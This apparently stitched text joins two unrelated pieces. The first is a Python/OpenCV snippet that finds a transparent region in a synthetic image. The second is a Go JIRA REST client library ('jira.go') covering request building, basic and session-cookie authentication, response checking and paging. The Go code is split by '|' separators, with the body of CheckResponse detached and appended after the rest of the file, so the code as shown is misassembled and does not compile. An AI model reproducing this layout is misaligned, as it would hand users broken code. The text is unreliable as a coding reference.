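# Synthetic 100x100 frame: opaque everywhere except a 40x60 transparent "screen".
frame = np.zeros((100, 100, 4), dtype=np.uint8)
frame[:, :, 3] = 255
frame[20:80, 30:70, 3] = 0  # rows 20..79, columns 30..69

alpha = cv2.threshold(frame[:, :, 3], 252, 255, cv2.THRESH_BINARY_INV)[1]
n, labels, stats, centroids = cv2.connectedComponentsWithStats(alpha, connectivity=8)
screen_label = labels[50, 50]  # the image centre lies inside the screen cut-out
x, y, w, h = stats[screen_label][:4]
print(x, y, w, h)  # expected: 30 20 40 60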
jira.go | package jira
import (
"bytes"
"encoding/json"
"fmt"
"io"
"net/http"
"net/url"
"reflect"
"github.com/google/go-querystring/query"
)
// A Client manages communication with the JIRA API.
type Client struct {
// HTTP client used to communicate with the API.
client *http.Client
// Base URL for API requests.
baseURL *url.URL
// Session storage if the user authenticates with a Session cookie
session *Session
// Services used for talking to different parts of the JIRA API.
Authentication *AuthenticationService
Issue *IssueService
Project *ProjectService
Board *BoardService
Sprint *SprintService
User *UserService
Group *GroupService
}
// NewClient returns a new JIRA API client.
// If a nil httpClient is provided, http.DefaultClient will be used.
// To use API methods which require authentication you can follow the preferred solution and
// provide an http.Client that will perform the authentication for you with OAuth and HTTP Basic (such as that provided by the golang.org/x/oauth2 library).
// As an alternative you can use Session Cookie based authentication provided by this package as well.
// See https://docs.atlassian.com/jira/REST/latest/#authentication
// baseURL is the HTTP endpoint of your JIRA instance and should always be specified with a trailing slash.
func NewClient(httpClient *http.Client, baseURL string) (*Client, error) {
if httpClient == nil {
httpClient = http.DefaultClient
}
parsedBaseURL, err := url.Parse(baseURL)
if err != nil {
return nil, err
}
c := &Client{
client: httpClient,
baseURL: parsedBaseURL,
}
c.Authentication = &AuthenticationService{client: c}
c.Issue = &IssueService{client: c}
c.Project = &ProjectService{client: c}
c.Board = &BoardService{client: c}
c.Sprint = &SprintService{client: c}
c.User = &UserService{client: c}
c.Group = &GroupService{client: c}
return c, nil
}
// NewRawRequest creates an API request.
// A relative URL can be provided in urlStr, in which case it is resolved relative to the baseURL of the Client.
// Relative URLs should always be specified without a preceding slash.
// Allows using an optional native io.Reader for sourcing the request body.
func (c *Client) NewRawRequest(method, urlStr string, body io.Reader) (*http.Request, error) {
rel, err := url.Parse(urlStr)
if err != nil {
return nil, err
}
u := c.baseURL.ResolveReference(rel)
req, err := http.NewRequest(method, u.String(), body)
if err != nil {
return nil, err
}
req.Header.Set("Content-Type", "application/json")
// Set authentication information
if c.Authentication.authType == authTypeSession {
// Set session cookie if there is one
if c.session != nil {
for _, cookie := range c.session.Cookies {
req.AddCookie(cookie)
}
}
} else if c.Authentication.authType == authTypeBasic {
// Set basic auth information
if c.Authentication.username != "" {
req.SetBasicAuth(c.Authentication.username, c.Authentication.password)
}
}
return req, nil
}
// NewRequest creates an API request.
// A relative URL can be provided in urlStr, in which case it is resolved relative to the baseURL of the Client.
// Relative URLs should always be specified without a preceding slash.
// If specified, the value pointed to by body is JSON encoded and included as the request body.
func (c *Client) NewRequest(method, urlStr string, body interface{}) (*http.Request, error) {
rel, err := url.Parse(urlStr)
if err != nil {
return nil, err
}
u := c.baseURL.ResolveReference(rel)
var buf io.ReadWriter
if body != nil {
buf = new(bytes.Buffer)
err = json.NewEncoder(buf).Encode(body)
if err != nil {
return nil, err
}
}
req, err := http.NewRequest(method, u.String(), buf)
if err != nil {
return nil, err
}
req.Header.Set("Content-Type", "application/json")
// Set authentication information
if c.Authentication.authType == authTypeSession {
// Set session cookie if there is one
if c.session != nil {
for _, cookie := range c.session.Cookies {
req.AddCookie(cookie)
}
}
} else if c.Authentication.authType == authTypeBasic {
// Set basic auth information
if c.Authentication.username != "" {
req.SetBasicAuth(c.Authentication.username, c.Authentication.password)
}
}
return req, nil
}
// addOptions adds the parameters in opt as URL query parameters to s. opt
// must be a struct whose fields may contain "url" tags.
func addOptions(s string, opt interface{}) (string, error) {
v := reflect.ValueOf(opt)
if v.Kind() == reflect.Ptr && v.IsNil() {
return s, nil
}
u, err := url.Parse(s)
if err != nil {
return s, err
}
qs, err := query.Values(opt)
if err != nil {
return s, err
}
u.RawQuery = qs.Encode()
return u.String(), nil
}
// NewMultiPartRequest creates an API request including a multi-part file.
// A relative URL can be provided in urlStr, in which case it is resolved relative to the baseURL of the Client.
// Relative URLs should always be specified without a preceding slash.
// If specified, the value pointed to by buf is a multipart form.
func (c *Client) NewMultiPartRequest(method, urlStr string, buf *bytes.Buffer) (*http.Request, error) {
rel, err := url.Parse(urlStr)
if err != nil {
return nil, err
}
u := c.baseURL.ResolveReference(rel)
req, err := http.NewRequest(method, u.String(), buf)
if err != nil {
return nil, err
}
// Set required headers
req.Header.Set("X-Atlassian-Token", "nocheck")
// Set authentication information
if c.Authentication.authType == authTypeSession {
// Set session cookie if there is one
if c.session != nil {
for _, cookie := range c.session.Cookies {
req.AddCookie(cookie)
}
}
} else if c.Authentication.authType == authTypeBasic {
// Set basic auth information
if c.Authentication.username != "" {
req.SetBasicAuth(c.Authentication.username, c.Authentication.password)
}
}
return req, nil
}
// Do sends an API request and returns the API response.
// The API response is JSON decoded and stored in the value pointed to by v, or returned as an error if an API error has occurred.
func (c *Client) Do(req *http.Request, v interface{}) (*Response, error) {
httpResp, err := c.client.Do(req)
if err != nil {
return nil, err
}
err = CheckResponse(httpResp)
if err != nil {
// Even though there was an error, we still return the response
// in case the caller wants to inspect it further
return newResponse(httpResp, nil), err
}
if v != nil {
// Open a NewDecoder and defer closing the reader only if there is a provided interface to decode to
defer httpResp.Body.Close()
err = json.NewDecoder(httpResp.Body).Decode(v)
}
resp := newResponse(httpResp, v)
return resp, err
}
// CheckResponse checks the API response for errors, and returns them if present.
// A response is considered an error if it has a status code outside the 200 range.
// The caller is responsible for analyzing the response body.
// The body can contain JSON (if the error is intended) or XML (sometimes JIRA just fails).
func CheckResponse(r *http.Response) error |
// GetBaseURL will return you the Base URL.
// This is the same URL as in the NewClient constructor
func (c *Client) GetBaseURL() url.URL {
return *c.baseURL
}
// Response represents JIRA API response. It wraps http.Response returned from
// API and provides information about paging.
type Response struct {
*http.Response
StartAt int
MaxResults int
Total int
}
func newResponse(r *http.Response, v interface{}) *Response {
resp := &Response{Response: r}
resp.populatePageValues(v)
return resp
}
// Sets paging values if response json was parsed to searchResult type
// (can be extended with other types if they also need paging info)
func (r *Response) populatePageValues(v interface{}) {
switch value := v.(type) {
case *searchResult:
r.StartAt = value.StartAt
r.MaxResults = value.MaxResults
r.Total = value.Total
}
return
}
| {
if c := r.StatusCode; 200 <= c && c <= 299 {
return nil
}
err := fmt.Errorf("Request failed. Please analyze the request body for more details. Status code: %d", r.StatusCode)
return err
} |